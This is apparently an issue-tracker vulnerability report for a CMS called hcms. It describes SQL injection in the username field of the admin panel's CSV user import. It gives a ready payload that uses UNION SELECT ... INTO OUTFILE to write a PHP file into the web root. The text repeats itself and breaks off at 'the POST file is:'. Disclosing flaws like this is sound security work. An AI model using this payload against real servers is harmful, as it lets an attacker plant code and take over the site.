After the administrator logs in, when adding a new user, choose to import the csv file, and there is SQL injection in the csv file username.
The csv file is as follows: test'/**/union/**/select/**/'<?php phpinfo(); ?>'/**/into/**/outfile/**/'C:\\phpstudy_pro\\WWW\\hcms\\info.php'#, test, test, 123@qwe.com, test1234
If mysql has writable permissions,this csv file will create a new phpinfo file in the website directory.
After the administrator logs in, when adding a new user, choose to import the csv file, and there is SQL injection in the csv file username.
The csv file is as follows:
test'/**/union/**/select/**/'<?php phpinfo(); ?>'/**/into/**/outfile/**/'C:\\phpstudy_pro\\WWW\\hcms\\info.php'#, test, test, 123@qwe.com, test1234If mysql has writable permissions,this csv file will create a new phpinfo file in the website directory.
the POST file is:
The text was updated successfully, but these errors were encountered: